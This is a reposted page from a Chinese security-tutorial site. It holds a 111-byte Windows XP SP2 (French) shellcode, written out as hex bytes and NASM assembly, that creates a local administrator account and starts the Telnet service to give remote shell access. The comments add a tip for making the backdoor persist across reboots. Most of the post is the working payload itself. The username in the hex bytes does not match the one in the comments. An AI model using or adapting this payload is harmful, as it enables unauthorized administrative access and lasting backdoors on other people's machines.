当前位置: 首页 > 图文教程 > 网络安全 > 杀毒防毒 > shellcode增加管理员账户开telnet

杀毒防毒
来自微软的免费杀毒软件抢先试用
金山毒霸全新功能体验版抢先曝光
IRC后门病毒技术分析及手动清除方法
MSN性感鸡变种刚过,QQ病毒又来捣乱
Win XP中震荡波后应采取的措施
病毒应急处理中心提醒防范高波病毒及其变种
北京公安局、瑞星发布6月13日危险病毒警报
防御计算机病毒十大必知步骤
网吧用QQ隐私难保 黑客工具窥视QQ聊天记录
用MailSpy拦截局域网内危险的病毒邮件
如何根据名称识别计算机病毒
Norton AntiVirus 2005测试版截图大赏
快速干掉感染Internet Explorer的恶意程序
邮件病毒入侵后五个清除步骤
Win 2000防毒从安装系统时开始
木马病毒清除的通用解法
快速有效地封杀—巧利用Iris来查找蠕虫病毒
防病毒必务宝典—计算机病毒专杀进程列表
网络安全之特洛伊木马攻防战略
3721上网助手清除专家

杀毒防毒 中的 shellcode增加管理员账户开telnet


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-20   浏览: 48 ::
收藏到网摘: n/a

  ; payload:add admin acount & Telnet Listening
  ; Author: DATA_SNIPER
  ; size:111 bytes
  ; platform:WIN32/XP SP2 FR
  ; thanks:Arab4services team & AT4RE Team
  ; more info: visit my blog http://datasniper.arab4services.net
  ; The Sh3llcode:
  ; "\xEB\x08\xBA\x4D\x11\x86\x7C\xFF\xD2\xCC\xE8\xF3\xFF\xFF\xFF\x63\x6D\x64\x20\x2F\x63"
  ; "\x20\x6E\x65\x74\x20\x75\x73\x65\x72\x20\x68\x69\x6C\x6C\x20\x31\x32\x33\x34\x35"
  ; "\x36\x20\x2F\x41\x44\x44\x20\x26\x26\x20\x6E\x65\x74\x20\x6C\x6F\x63\x61\x6C\x67"
  ; "\x72\x6F\x75\x70\x20\x41\x64\x6D\x69\x6E\x69\x73\x74\x72\x61\x74\x65\x75\x72\x73"
  ; "\x20\x68\x69\x6C\x6C\x20\x2F\x41\x44\x44\x20\x26\x26\x20\x73\x63\x20\x73\x74\x61"
  ; "\x72\x74\x20\x54\x6C\x6E\x74\x53\x76\x72\x00"
  ; Description: it's simular to TCP BindShell on port 23,throught Command execution we can get shell access throught telnet service on Windows b0x.
  ; Add admin account command user=GAZZA ,pass=123456 :cmd /c net user GAZZA 123456 /ADD && net localgroup Administrateurs GAZZA /ADD
  ; Start telnet service: sc start TlntSvr
  ; For saving ur access to the B0x again and again :),u can use this command:
  ; "sc config TlntSvr start= auto &  sc start TlntSvr" instead of:
  ; "sc start TlntSvr"
  ; NASM -s -fbin telnetbind.asm
  BITS 32
  db 0EBh,08h    ;such as "jmp Data" ,i puted it in opcode format for avoiding null problem.
  Exec:
  MOV EDX,7C86114Dh ;WinExec addr in WIN XP SP2 FR
  CALL EDX
  INT3 ;just interrupter (hung the shellcode after it do his job,any way u can use ExitProcess) for avoiding infinite loop
  Data:
  CALL Exec
  db 'cmd /c net user GAZZA 123456 /ADD & net localgroup Administrateurs GAZZA /ADD & sc start TlntSvr',00h
  ;add user GAZA with 123456 password and start telnet service ;BTW the exstension cuted for saving som byte ;)